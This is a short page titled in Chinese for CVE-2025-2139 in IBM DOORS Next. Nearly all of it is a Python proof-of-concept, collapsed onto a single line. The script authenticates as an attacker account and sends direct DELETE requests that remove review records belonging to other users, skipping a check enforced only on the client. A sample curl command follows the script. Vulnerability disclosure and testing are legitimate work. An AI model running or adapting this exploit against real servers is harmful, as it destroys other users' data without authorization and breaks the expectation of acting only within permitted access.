CVE-2025-2139 IBM DOORS Next 权限绕过漏洞

# CVE-2025-2139 PoC - IBM DOORS Next Review Deletion Access Control Bypass # This PoC demonstrates how to bypass client-side enforcement to delete reviews from other users import requests import json # Configuration TARGET_URL = "https://target-doors-next-server:9443" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Authenticate and obtain session session = requests.Session() session.verify = False # For testing purposes only # Login to obtain JAZZ authentication token login_url = f"{TARGET_URL}/jts/authenticated/identity" login_data = { "j_username": USERNAME, "j_password": PASSWORD } response = session.post( f"{TARGET_URL}/jts/authenticated/j_security_check", data=login_data ) # Get the authentication token from cookies auth_token = session.cookies.get("JSESSIONID") print(f"[+] Obtained session: {auth_token}") # Step 2: Enumerate target review IDs belonging to other users # Reviews can be found via the DOORS Next review API reviews_url = f"{TARGET_URL}/rm/reviews" headers = { "Accept": "application/json", "Jazz-Token": auth_token, "Content-Type": "application/json" } # Step 3: Attempt to delete a review belonging to another user # The review ID (e.g., "_abc123") belongs to a different user target_review_id = "_target_review_id_here" delete_url = f"{TARGET_URL}/rm/reviews/{target_review_id}" # Step 4: Send DELETE request - server fails to verify ownership # Client-side check is bypassed because we send the request directly response = session.delete( delete_url, headers=headers ) if response.status_code == 200 or response.status_code == 204: print(f"[+] Successfully deleted review {target_review_id} belonging to another user!") print(f"[+] Response: {response.status_code} - {response.text}") else: print(f"[-] Failed: {response.status_code} - {response.text}") # Alternative: Use curl to bypass client-side JavaScript validation # curl -X DELETE "https://target:9443/rm/reviews/_reviewId" \ # -H "Jazz-Token: <token>" \ # -H "Cookie: JSESSIONID=<session_id>"